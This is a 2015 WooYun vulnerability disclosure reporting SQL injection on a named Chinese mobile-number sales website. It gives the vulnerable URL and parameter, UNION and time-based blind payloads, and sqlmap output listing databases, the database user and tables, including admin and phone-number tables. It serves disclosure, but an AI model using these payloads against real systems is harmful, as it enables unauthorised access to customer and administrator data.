当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143463

漏洞标题:选号网官网sql时间盲注(8个数据库+236个表+可泄漏全部号码+ucadmin)

相关厂商:选号网

漏洞作者: 路人甲

提交时间:2015-09-28 09:10

修复时间:2015-11-12 09:12

公开时间:2015-11-12 09:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
北京选号网-是北京最大最全的手机号码销售基地,数十万张北京手机号码低价促销,销售各类北京全球通、动感地带、神州行畅听卡、大众卡、UP新势 力、如意通、无限通...........

详细说明:

注入点

http://www.xuanhao.com/spxx/liantong.php?rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=0105&hd=&jg=&sw=


数据

Place: GET
Parameter: flbm
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=-5282' UNION SELECT CONCAT(0x3a667
0693a,0x50797a75745578684766,0x3a636a713a), NULL, NULL# AND 'gXVh'='gXVh&hd=&jg=
&sw=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=0105' AND SLEEP(5) AND 'BChR'='BCh
R&hd=&jg=&sw=
---
[17:24:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.11, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[17:24:50] [INFO] fetching current user
current user: '28_2011xuan@localhost'


8个数据库

available databases [8]:
[*] 15_testxh
[*] 28_2011xuan
[*] 46_gdxuanhao
[*] 47_szxuanhao
[*] information_schema
[*] js_xuanhao
[*] test
[*] xuanhaodotcom


220多表

Database: js_xuanhao
[29 tables]
+---------------------------------------+
| hao_bm |
| hao_dyfl |
| hao_dzhm |
| hao_gwc_ddb |
| hao_gwc_shr |
| hao_gwc_wdsc |
| hao_gwc_xx |
| hao_hyjbxx |
| hao_news |
| hao_news_category |
| hao_number |
| hao_numberbak |
| ..........省略..... |
| hao_spxx |
| ..........省略.....
..........省略..... |
| hao_xwxq |
| hao_xwztml |
| hao_zxzx |
+---------------------------------------+
Database: 47_szxuanhao
[33 tables]
+---------------------------------------+
| hao_bm |
| hao_dyfl |
| hao_dzhm |
| hao_glry |
| hao_glrydl |
| hao_glryqx_category |
| hao_glryxs |
| hao_gwc_ddb |
| hao_gwc_shr |
| hao_gwc_wdsc |
| hao_gwc_xx |
| hao_hyjbxx |
| hao_news |
| hao_news_category |
| hao_number |
..........省略.....
..........省略..... |
+---------------------------------------+
Database: 46_gdxuanhao
[33 tables]
+---------------------------------------+
| hao_bm |
| hao_dyfl |
| hao_dzhm |
| hao_glry |
| hao_glrydl |
| hao_glryqx_category |
| hao_glryxs |
| hao_gwc_ddb |
| hao_gwc_shr |
| hao_gwc_wdsc |
| hao_gwc_xx |
| hao_hyjbxx |
| hao_news |
|..........省略..... |
| ..........省略..... ..........省略.....
..........省略.....
..........省略..... |
+---------------------------------------+
Database: test
[19 tables]
+---------------------------------------+
| uc_admins |
| uc_applications |
| uc_badwords |
| s |
|,,,,,,,,,,,,,,,...........省略..... |
+---------------------------------------+
Database: xuanhaodotcom
[8 tables]
+---------------------------------------+
| c_category |
| c_company |
| c_glry |
| c_glrydl |
| c_storage |
..........省略.....
..........省略.....
..........省略.....
..........省略..... |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
|..................................
................. |
+---------------------------------------+


之所以说全部号码:看4个数据库都是选号的

[*] 28_2011xuan
[*] 46_gdxuanhao
[*] 47_szxuanhao
[*] js_xuanhao


hao_number


uc_admins


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝